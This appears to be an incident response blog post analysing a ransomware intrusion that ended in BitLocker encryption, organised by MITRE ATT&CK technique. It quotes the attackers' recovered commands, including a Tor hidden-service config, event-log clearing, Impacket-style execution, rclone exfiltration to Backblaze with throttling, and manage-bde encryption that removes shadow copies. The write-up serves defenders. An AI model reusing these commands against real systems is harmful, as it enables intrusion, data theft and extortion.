Nameless and shameless: Ransomware Encryption via BitLocker

Summary

Tl;dr

This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving an unknown ransomware strain but known TTPs.

Below provides a summary of findings which are presented in this blog post: Initial Access via Remote Desktop Web Access service Leveraging RDP, Tor and AnyDesk for persistence Creation of new accounts Using SMB and RDP for lateral movement Exfiltration of data via Backblaze Enabling BitLocker device encryption and holding the keys to ransom

Incident Overview

Initial access was gained via the externally facing Remote Desktop Web Access service. Upon access the threat actor conducted reconnaissance activity and deployed AnyDesk. The Windows command shell was utilised extensively to facilitate command execution and persistence was maintained via RDP, creation of new accounts and services. Data was exfiltrated using a lesser-known cloud storage provider and BitLocker was used to encrypt devices in the victim’s environment.

Timeline

T – Initial Access gained
T +2 days – Reconnaissance activity
T +3 days – Discovery activity
T +4 days – Execution of commonly used tools
T +5 days – Data exfiltration begins
T + 6 days – Further data exfiltration
T + 7 days – Device encryption using BitLocker

Mitre TTPs

Initial Access

T1133 - External Remote Services
The threat actor gained initial access via the externally facing Remote Desktop Web Access service on a gateway that brokers RDP connections into the victim’s environment, enabling the threat actor to establish an RDP session.
The first evidence of the threat actor accessing the network was from the 128.154.207[.]157 IP address; they successfully authenticated using a legitimate account. The established session enabled the threat actor to log into a host using the same account and deploy AnyDesk.
The threat actor also gained access via this remote desktop service using the same legitimate account but this time from the IP address 45.151.167[.]11. Subsequently, the threat actor logged into the remote desktop server and deployed AnyDesk and ssh.exe, as well as performing domain enumeration activities.

T1078.002 - Valid Accounts: Domain Accounts
Additionally, the threat actor leveraged valid credentials to establish RDP sessions via the remote desktop gateway.
Due to the high volume of password guessing targeting the Remote Desktop Web Access service, it is highly likely the threat actor was able to compromise the affected account credentials through a brute force password attack.

Execution

T1053 – Scheduled Task/Job

Various scheduled tasks were executed.

sc create RustDesk binpath= "\"C:\Program Files\RustDesk\RustDesk.exe\" --service" start= auto DisplayName= "RustDesk Service"

sc create Tor binPath= "C:\Programdata\Tor\tor.exe --nt-service -f C:\Programdata\Tor\torrc" start= auto

sc config sshd start= auto

T1059.001 - Command and Scripting Interpreter:PowerShell

PowerShell was also leveraged to run scripts and execute commands, mostly to perform reconnaissance across the domain.

The below script was identified. Based on the file name, it appears to enumerate Active Directory account details for all domains.

"powershell.exe" -executionpolicy bypass -file .\Get-ADUserDetailsAllDomains.ps1

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Windows command shell (cmd.exe) was utilised extensively, particularly using Impacket, which relies on cmd.exe to facilitate command execution.

The below command was almost certainly executed using Impacket:

cmD.eXE /Q /c, echo c:\programdata\tor.exe -oc:\programdata -y -p"fortnort " ^> \\127.0.0.1\ADMIN$\yk 2^>^&1 > C:\Windows\TEMP\wdfuai.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Windows\TEMP\wdfuai.bat & del C:\Windows\TEMP\wdfuai.bat

Persistence

T113 – External Remote Service

As the RD Web Access service was externally facing, the threat actor was able to establish RDP sessions into the victim’s environment.

T1078.002 – Valid Accounts: Domain Accounts

The threat actor leveraged valid credentials for a genuine account and established RDP sessions via the gateway. These RDP sessions gave the threat actor a foothold into the environment until the affected account credentials were reset.

Furthermore, a domain account named backdoor was created on one of the affected domains.

T1078.003 - Valid Accounts: Local Accounts

The threat account created local accounts named adm on three compromised servers. On each server, the account was added to the local administrator group.

T1543.003 - Create or Modify System Process: Windows Service

Various Windows services were created across multiple compromised systems to establish remote access.

The following command line was executed during system startup which enabled the threat actor to establish remote access to the hosts via a hidden Tor service.

C:\Programdata\Tor\tor.exe --nt-service -f C:\Programdata\Tor\torrc

The threat actor leveraged Tor to establish a SOCKS proxy which allowed the threat actor to access network services such as RDP and SMB on internal hosts. The SOCKS proxy configuration was recovered:

SOCKSPort 9050

DataDirectory c:\programdata\tor

ControlPort 9051

CookieAuthentication 1

HiddenServiceDir c:\programdata\tor\conf HiddenServicePort 3389 127.0.0.1:3389

HiddenServicePort 445 127.0.0.1:445

HiddenServicePort 22 127.0.0.1:22

HiddenServicePort 5985 127.0.0.1:5985

HiddenServicePort 5986 127.0.0.1:5986

This configuration instructs Tor to run a hidden service which directs any traffic received via the SOCKS proxy to specific ports on the local machine. This facilitated access to the network services actively listening on the above ports.

Additionally, a service was created to execute AnyDesk, another means to obtain access to the victim’s network.

Privilege Escalation

T1078.002 - Valid Accounts: Domain Accounts

Several high privileged domain accounts across multiple domains were compromised.

The account backdoor created by the threat actor, was assigned domain administrator privileges on one of the affected domains.

All of the domain administrator accounts had domain administrator privileges across the overlying domain forest due to the transitive trusts between sibling domains.

T1078.003 - Valid Accounts: Local Accounts

As mentioned in Persistence, the threat account created local accounts named adm on three compromised servers. On each server, the account was added to the local administrator group.

Defence Evasion

T1562.004 - Impair Defenses: Disable or Modify System Firewall

This firewall rule was added: netsh advfirewall firewall add rule name="RustDesk Service" dir=in action=allow program="C:\Program Files\RustDesk\RustDesk.exe" enable=yes

T1070 – Indicator Removal

RustDesk usage was erased by the threat actor using commands such as:

taskkill /F /IM RustDesk.exe /FI "PID ne 6824"

reg delete HKEY_CLASSES_ROOT\rustdesk /f

netsh advfirewall firewall delete rule name="RustDesk Service"

T1070.001 - Indicator Removal: Clear Windows Event Logs

"cmd.EXE" /c timeout 120 >nul && for /F "usebackq tokens=*" %1 in (`wevtutil.exe el`) DO wevtutil.exe cl "%1" && schtasks /Delete /TN "GoogleUpd" /F

The above cmd.exe command was used to clear Windows Event Logs on two servers.

T1070.004 - Indicator Removal: File Deletion

Files pertaining to the threat actor’s post exploitation activities such as reconnaissance of the internal network, were deleted to hinder forensic analysis efforts. The following files which were deleted, likely contained output from reconnaissance activities:

• C:\ProgramData\trustdmp.txt
• C:\ProgramData\subnets.txt
• C:\ProgramData\ad_users.txt
• C:\ProgramData\ad_ous.txt
• C:\ProgramData\ad_group.txt
• C:\ProgramData\ad_computers.txt
• C:\ProgramData\netscan\netscan\oui.txt

Tools used by the threat actor were also deleted:

• C:\ProgramData\Advanced_Port_Scanner_2.5.3869.exe
• C:\ProgramData\wiztree_4_04_portable\WizTree64.exe
• C:\ProgramData\AdFind.exe
• C:\ProgramData\netscan\netscan\netscan.exe

T1070.006 - Indicator Removal: Timestomp

The following files were dropped by the threat actor who had changed their created timestamp to historic values.

• C:\ProgramData\VeeamLicense.dll
• C:\ProgramData\Veeam_ASv11_1500.lic
• C:\ProgramData\wiztree_4_04_portable.zip
• C:\ProgramData\libcrypto.dll
• C:\ProgramData\ssh.exe
• C:\ProgramData\netscan.zip
• C:\ProgramData\7-ZipPortable_22.01.paf.exe

T1070.009 - Indicator Removal: Clear Persistence

"cmd.EXE" /c timeout 120 >nul && for /F "usebackq tokens=*" %1 in (`wevtutil.exe el`) DO wevtutil.exe cl "%1" && schtasks /Delete /TN "GoogleUpd" /F

The scheduled task GoogleUpd was deleted.

Credential Access

T1003.006 - OS Credential Dumping: DCSync

A DCSync attack involves leveraging a highly privileged domain account to initiate the replication process on a remote domain controller (DC) which results in the replication and sending NTDS.dit to a threat actor controller system. A DCSync attack was detected in the victim’s environment.

Discovery

T1087 - Account Discovery

The command net.exe accounts was executed across hosts.

T1087.002 - Account Discovery: Domain Account

The files C:\ProgramData\users.txt, ALL_Domains-Users.txt and ad_users.txt relating to domain users were identified.

T1135 - Network Share Discovery

Network shares were probed and accessed by the threat actor on multiple hosts.

T1046 - Network Service Discovery

SoftPerfect Network Scanner (Netscan) was used to conduct port scanning activities to understand what network services were actively running on hosts.

Advanced Port Scanner was also utilised to perform network scanning activity and Advanced IP Scanner was leveraged on one server.

T1018 - Remote System Discovery

Scanning was conducted to collect a list of neighbouring systems that could be targeted. Additionally, PowerView, commonly used for network and Windows domain enumeration, was leveraged by the threat actor. PowerView was disguised in the file C:\ProgramData\New Text Document.txt.

Once the PowerView module was imported, the threat actor invoked the below function to find all systems within the AD forest where the current user had local administrator privileges. The current user was the same user as the legitimate account used for initial access.

Invoke-FindLocalAdminAccess -Threads 100 -SearchForest -Verbose

T1482 - Domain Trust Discovery

The below commands were executed to collect domain trust information.

nltest.exe /domain_trusts

nltest.exe /dclist:

The output of this activity was likely contained in this file C:\ProgramData\trustdmp.txt.

T1083 - File and Directory Discovery

The disk space analyser WizTree was used to perform a full directory and file listing of the local system on two servers where data exfiltration activity occurred.

Lateral Movement

T1021.002 - Remote Services: SMB/Windows Admin Shares

SMB was leveraged to execute processes on remote hosts. The observed activity matched that of Impacket.

C:\WindOws\SyStem32\cmD.eXE /Q /c, echo c:\programdata\tor\install_service.bat ^> \\127.0.0.1\ADMIN$\ps 2^>^&1 > C:\Users\%username%\AppData\Local\Temp\swadso.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Users\%username%\AppData\Local\Temp\swadso.bat & del C:\Users\%username%\AppData\Local\Temp

T1021.001 - Remote Services: Remote Desktop Protocol

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /f /d 0 /t REG_DWORD

This process was likely executed remotely via Impacket, with the RestrictedAdmin mode enabled. This mode allowed the threat actor to perform a pass-the-hash to authenticate and establish an RDP session with just the password hash of an account.

Collection

T1005 - Data from Local System

Rclone was leveraged to exfiltrate data stored on a D drive on one of the compromised hosts. It is likely the threat actor mounted virtual disks of virtual machines via a virtual machine they created. This would have allowed the threat actor to access data stored on the virtual disks via a local mount point.

One of the Rclone commands executed (see under Exfiltration) specified exclusions of files and folders with the strings "ackup", "BACKUP", "SNAPSHOT" and "napshot" to avoid exfiltrating backup and snapshot files from the target drive.

T1039 - Data from Network Shared Drive

The threat actor browsed data on remote systems via SMB. The following command was executed to browse data on the operating system drive of one host.

"explorer.exe" \\\C$

T1074.002 - Data Staged: Remote Data Staging

Data in the form of Veeam backups were staged on one host. This was achieved by installing Veeam on the host and configuring it as a backup server. The Veeam backup service was then installed on other hosts to obtain data.

Veeam was configured to perform entire computer backups, as seen below:

General ------------------------------------------

Backup job name: Agent Backup Job 3 - 10.2.0.7

Backup job description:

Source -------------------------------------------

Backup mode: entire computer

The entire computer will be backed up

Destination --------------------------------------

Veeam Agent for Microsoft Windows repository

Backup server:<SERVER NAME>

Backup repository: Object storage repository 1

Keep restore points for the last 7 days

Compression level: High

Storage optimization: 1MB (recommended)

Storage encryption: disabled

The Veeam backups were configured to use compression during the backup process. Useful Veeam logs were identified in C:\ProgramData\Veeam\Backup.

Command and Control

T1572 - Protocol Tunnelling

SSH tunnels were established to the IP address 128.254.207[.]157 from multiple compromised systems to create an encrypted channel that acted as a direct ingress point into the internal network for the threat actor.

Additionally, a hidden Tor service was utilised to tunnel RDP traffic from the threat actor to several compromised systems.

T1219 - Remote Access Software

The remote monitoring and management tools AnyDesk and RustDesk were deployed.

"cmd.exe" /C C:\Users\\AppData\Local\Temp\3458\RustDesk_install.bat

Exfiltration

T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage

Rclone was leveraged to exfiltrate data to the cloud storage provider Backblaze.

The Rclone config file was located at C:\ProgramData\rclone.conf on the host which was configured as a backup server via Veeam. The configuration specified that the targeted data would be uploaded via SMB to another host before it was uploaded to Backblaze.

The credentials supplied to facilitate the SMB data uploaded belonged to a local account created by the threat actor.

Traffic was also identified from the virtual machine created by the threat actor to Backblaze servers. During the period of this activity, 5.2 TB of data was sent to Backblaze IP addresses.

T1537 - Transfer Data to Cloud Account

The threat actor created a Backblaze account via Google Chrome on one of the compromised hosts. A temporary email address was generated via temp-mail[.]io.

T1030 - Data Transfer Size Limits

Data exfiltrated via Rclone was throttled by specifying bandwidth transfer limits as seen below:

"rclone.exe" copy D:\ b2:/test//D/ --ignore-existing --auto-confirm --multi-thread-streams 150 --transfers 150 --config c:\programdata\rclone.conf --log-file=c:\programdata\rclone9.log --exclude **napshot** --exclude **ackup** --exclude **SNAPSHOT** --exclude **BACKUP** --bwlimit "Mon-07:00,56M Mon-23:00,off Tue-07:00,56M Tue-23:00,off Wed-07:00,56M Wed-23:00,off Thu-07:00,56M Thu-23:00,off Fri-07:00,56M **********

A bandwidth limit of 56 MiB per second was incorporated into the use of Rclone to limit data exfiltration activity between the hours of 07:00 and 23:00 on working days to avoid causing any network performance issues which could have resulted in detection of this activity.

Impact

T1486 - Data Encrypted for Impact

As seen below, the threat actor used the manage-bde.exe utility to enable BitLocker device encryption across multiple systems. The associated keys were held to ransom.

manage-bde -on C: -Password ********** -UsedSpaceOnly -RemoveVolumeShadowCopies

manage-bde -on D: -Password ********** -UsedSpaceOnly -RemoveVolumeShadowCopies

Encryption impacted both the OS drives and data drives of targeted systems.

The C:\+_+_+ BITLOCKER KEYS was created. This folder contained a ransom note.

It should be noted that Microsoft Defender censored the BitLocker password from command lines so during the analysis the passwords could not be recovered. IOC List Below is a list of SHA1 and SHA2656 hashes observed during the investigation.

IOC List

Below is a list of SHA1 and SHA2656 hashes observed during the investigation.